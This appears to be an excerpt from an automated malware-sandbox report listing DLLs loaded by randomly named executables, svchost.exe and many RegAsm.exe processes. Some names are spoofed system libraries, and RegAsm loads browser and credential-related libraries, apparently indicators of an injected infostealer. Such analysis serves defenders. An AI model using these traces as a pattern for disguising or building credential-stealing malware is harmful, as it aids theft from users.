                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeSection loaded: msimg32.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeSection loaded: msvcr100.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeSection loaded: version.dll
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeSection loaded: k7rn7l32.dll
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeSection loaded: ntd3ll.dll
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeSection loaded: winmm.dll
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeSection loaded: powrprof.dll
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeSection loaded: umpdc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: textshaping.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msisip.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wshext.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appxsip.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: opcservices.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: esdsip.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: scrrun.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dll
